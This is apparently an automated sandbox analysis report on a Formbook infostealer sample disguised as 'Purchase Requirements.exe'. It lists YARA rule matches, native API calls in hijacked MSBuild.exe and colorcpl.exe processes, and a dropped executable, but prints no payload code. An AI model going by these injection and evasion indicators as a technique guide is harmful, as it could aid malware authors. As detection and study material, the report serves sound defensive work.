Source: Yara match File source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Purchase Requirements.exe
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004181C0 NtCreateFile, 7_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00418270 NtReadFile, 7_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004182F0 NtClose, 7_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004183A0 NtAllocateVirtualMemory, 7_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041826C NtReadFile, 7_2_0041826C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00418215 NtCreateFile, 7_2_00418215
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004182EA NtClose, 7_2_004182EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429910 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_01429910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014299A0 NtCreateSection,LdrInitializeThunk, 7_2_014299A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429840 NtDelayExecution,LdrInitializeThunk, 7_2_01429840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429860 NtQuerySystemInformation,LdrInitializeThunk, 7_2_01429860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014298F0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_014298F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429A50 NtCreateFile,LdrInitializeThunk, 7_2_01429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429A00 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_01429A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429A20 NtResumeThread,LdrInitializeThunk, 7_2_01429A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429540 NtReadFile,LdrInitializeThunk, 7_2_01429540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014295D0 NtClose,LdrInitializeThunk, 7_2_014295D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429710 NtQueryInformationToken,LdrInitializeThunk, 7_2_01429710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429FE0 NtCreateMutant,LdrInitializeThunk, 7_2_01429FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429780 NtMapViewOfSection,LdrInitializeThunk, 7_2_01429780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014297A0 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_014297A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429660 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_01429660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014296E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_014296E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429950 NtQueueApcThread, 7_2_01429950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014299D0 NtCreateProcessEx, 7_2_014299D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142B040 NtSuspendThread, 7_2_0142B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429820 NtEnumerateKey, 7_2_01429820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014298A0 NtWriteVirtualMemory, 7_2_014298A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429B00 NtSetValueKey, 7_2_01429B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142A3B0 NtGetContextThread, 7_2_0142A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429A10 NtQuerySection, 7_2_01429A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429A80 NtOpenDirectoryObject, 7_2_01429A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429560 NtWriteFile, 7_2_01429560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429520 NtWaitForSingleObject, 7_2_01429520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142AD30 NtSetContextThread, 7_2_0142AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014295F0 NtQueryInformationFile, 7_2_014295F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429760 NtOpenProcess, 7_2_01429760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429770 NtSetInformationFile, 7_2_01429770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142A770 NtOpenThread, 7_2_0142A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142A710 NtOpenProcessToken, 7_2_0142A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429730 NtQueryVirtualMemory, 7_2_01429730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429650 NtQueryValueKey, 7_2_01429650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429670 NtQueryInformationProcess, 7_2_01429670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429610 NtEnumerateValueKey, 7_2_01429610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014296D0 NtCreateKey, 7_2_014296D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459840 NtDelayExecution,LdrInitializeThunk, 15_2_04459840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_04459860
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459540 NtReadFile,LdrInitializeThunk, 15_2_04459540
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_04459910
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044595D0 NtClose,LdrInitializeThunk, 15_2_044595D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044599A0 NtCreateSection,LdrInitializeThunk, 15_2_044599A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459650 NtQueryValueKey,LdrInitializeThunk, 15_2_04459650
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459A50 NtCreateFile,LdrInitializeThunk, 15_2_04459A50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459660 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_04459660
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044596D0 NtCreateKey,LdrInitializeThunk, 15_2_044596D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044596E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_044596E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459710 NtQueryInformationToken,LdrInitializeThunk, 15_2_04459710
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459FE0 NtCreateMutant,LdrInitializeThunk, 15_2_04459FE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459780 NtMapViewOfSection,LdrInitializeThunk, 15_2_04459780
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445B040 NtSuspendThread, 15_2_0445B040
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459820 NtEnumerateKey, 15_2_04459820
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044598F0 NtReadVirtualMemory, 15_2_044598F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044598A0 NtWriteVirtualMemory, 15_2_044598A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459950 NtQueueApcThread, 15_2_04459950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459560 NtWriteFile, 15_2_04459560
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459520 NtWaitForSingleObject, 15_2_04459520
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445AD30 NtSetContextThread, 15_2_0445AD30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044599D0 NtCreateProcessEx, 15_2_044599D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044595F0 NtQueryInformationFile, 15_2_044595F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459670 NtQueryInformationProcess, 15_2_04459670
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459A00 NtProtectVirtualMemory, 15_2_04459A00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459610 NtEnumerateValueKey, 15_2_04459610
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459A10 NtQuerySection, 15_2_04459A10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459A20 NtResumeThread, 15_2_04459A20
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459A80 NtOpenDirectoryObject, 15_2_04459A80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459760 NtOpenProcess, 15_2_04459760
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459770 NtSetInformationFile, 15_2_04459770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445A770 NtOpenThread, 15_2_0445A770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459B00 NtSetValueKey, 15_2_04459B00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445A710 NtOpenProcessToken, 15_2_0445A710
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459730 NtQueryVirtualMemory, 15_2_04459730
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044597A0 NtUnmapViewOfSection, 15_2_044597A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445A3B0 NtGetContextThread, 15_2_0445A3B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B082F0 NtClose, 15_2_02B082F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B08270 NtReadFile, 15_2_02B08270
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B083A0 NtAllocateVirtualMemory, 15_2_02B083A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B081C0 NtCreateFile, 15_2_02B081C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B082EA NtClose, 15_2_02B082EA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B08215 NtCreateFile, 15_2_02B08215
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0826C NtReadFile, 15_2_02B0826C
Detected potential crypto function
Source: C:\Users\user\Desktop\Purchase Requirements.exe Code function: 0_2_00504C65 0_2_00504C65
Source: C:\Users\user\Desktop\Purchase Requirements.exe Code function: 0_2_02739990 0_2_02739990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00401030 7_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B909 7_2_0041B909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00408C60 7_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00408C64 7_2_00408C64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00402D88 7_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041CE65 7_2_0041CE65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EF900 7_2_013EF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01404120 7_2_01404120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1002 7_2_014A1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FB090 7_2_013FB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141EBB0 7_2_0141EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E0D20 7_2_013E0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B1D55 7_2_014B1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412581 7_2_01412581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FD5E0 7_2_013FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F841F 7_2_013F841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01406E30 7_2_01406E30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1002 15_2_044D1002
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442841F 15_2_0442841F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442B090 15_2_0442B090
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E1D55 15_2_044E1D55
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441F900 15_2_0441F900
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04410D20 15_2_04410D20
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442D5E0 15_2_0442D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04436E30 15_2_04436E30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444EBB0 15_2_0444EBB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02AF2FB0 15_2_02AF2FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02AF8C64 15_2_02AF8C64
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02AF8C60 15_2_02AF8C60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02AF2D88 15_2_02AF2D88
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02AF2D90 15_2_02AF2D90
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 013EB150 appears 32 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0441B150 appears 32 times
Sample file is different than original file name gathered from version info
Source: Purchase Requirements.exe, 00000000.00000002.704034282.0000000006E50000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000000.653671470.00000000005C0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUIPermissionAttribu.exe6 vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000002.693037255.0000000002851000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameConfigNodeType.dll> vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000002.707699415.000000000E3A0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000002.707699415.000000000E3A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000002.707276265.000000000E2A0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000002.704651839.00000000070A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameStoreElement.dllB vs Purchase Requirements.exe
Source: Purchase Requirements.exe Binary or memory string: OriginalFilenameUIPermissionAttribu.exe6 vs Purchase Requirements.exe
Uses 32bit PE files
Source: Purchase Requirements.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Purchase Requirements.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: UCnSWpQKXBXg.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: *.sln
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: /ignoreprojectextensions:.sln
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/4@8/6
Source: C:\Users\user\Desktop\Purchase Requirements.exe File created: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe Jump to behavior
